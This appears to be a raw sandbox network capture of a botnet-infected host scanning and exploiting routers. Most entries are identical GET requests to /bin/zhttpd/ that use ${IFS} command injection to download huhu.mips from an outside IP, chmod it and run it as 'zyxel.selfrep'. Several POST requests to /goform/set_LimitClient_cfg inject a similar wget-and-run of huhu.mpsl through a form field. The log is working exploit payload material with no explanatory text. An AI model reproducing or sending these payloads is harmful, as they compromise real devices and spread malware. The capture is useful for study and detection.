                                                Jan 29, 2024 07:07:46.309575081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3982192.168.2.233569648.134.243.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309653044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3983192.168.2.2349690185.177.245.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309714079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3984192.168.2.233518038.58.17.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.309768915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3985192.168.2.2337920173.46.151.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.315263033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3986192.168.2.2334550192.27.39.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.315313101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3987192.168.2.2342468119.248.163.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.315393925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3988192.168.2.2353664150.120.204.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.315442085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3989192.168.2.2345492188.111.35.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.315507889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3990192.168.2.235671860.100.91.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.315573931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3991192.168.2.2353146159.127.65.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.315638065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3992192.168.2.2359444172.65.77.2538080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.563057899 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3993192.168.2.2360710211.114.76.2138080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.730532885 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:47.010885954 CET311INHTTP/1.0 400 Bad Request
                                                Date: Mon, 29 Jan 2024 06:07:43 GMT
                                                Server: Httpd/1.0
                                                Connection: close
                                                Content-Type: text/html; charset=ISO-8859-1
                                                Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3994192.168.2.2346214141.147.87.408080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:46.884769917 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:47.089586020 CET88INHTTP/1.0 400 Bad Request
                                                Data Raw: 43 6c 69 65 6e 74 20 73 65 6e 74 20 61 6e 20 48 54 54 50 20 72 65 71 75 65 73 74 20 74 6f 20 61 6e 20 48 54 54 50 53 20 73 65 72 76 65 72 2e 0a
                                                Data Ascii: Client sent an HTTP request to an HTTPS server.


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3995192.168.2.234950664.34.49.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318623066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3996192.168.2.2359174202.75.234.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318681955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3997192.168.2.235983095.104.250.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318744898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3998192.168.2.2354762102.46.214.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318783998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3999192.168.2.235611051.183.118.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318841934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4000192.168.2.2336956133.142.215.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318891048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4001192.168.2.2350394188.186.238.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318928003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4002192.168.2.2360836104.175.214.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.318963051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4003192.168.2.234132452.18.194.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319022894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4004192.168.2.2339014182.217.223.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319070101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4005192.168.2.2358090198.49.44.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319099903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4006192.168.2.2344350135.234.17.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319125891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4007192.168.2.234793674.93.84.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319179058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4008192.168.2.2350918129.1.35.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319199085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4009192.168.2.2353988176.224.214.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319256067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4010192.168.2.2345162132.144.108.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319286108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4011192.168.2.2339634202.27.49.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319322109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4012192.168.2.233693213.226.215.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319345951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4013192.168.2.2339484106.19.13.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319382906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4014192.168.2.2350116167.126.87.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319416046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4015192.168.2.2355522196.181.214.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319472075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4016192.168.2.235618262.190.166.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319523096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4017192.168.2.23562545.235.53.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319552898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4018192.168.2.234766499.43.10.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319581985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4019192.168.2.234098832.189.99.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319628954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4020192.168.2.2354504116.7.218.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319664001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4021192.168.2.233293899.155.56.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319717884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4022192.168.2.2358568119.252.248.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319772959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4023192.168.2.2346066142.49.177.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319807053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4024192.168.2.2352736136.134.171.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319849968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4025192.168.2.234426639.100.11.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319922924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4026192.168.2.235694076.252.235.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319930077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4027192.168.2.235267032.231.159.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319961071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4028192.168.2.234849662.195.57.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.319993019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4029192.168.2.235143665.134.53.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320067883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4030192.168.2.2354332180.14.159.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320091009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4031192.168.2.235831239.93.202.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320138931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4032192.168.2.235508454.75.166.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320154905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4033192.168.2.233403287.96.101.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320173979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4034192.168.2.235416039.102.102.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320221901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4035192.168.2.2355166199.120.110.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320239067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4036192.168.2.233528480.8.179.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:47.320298910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


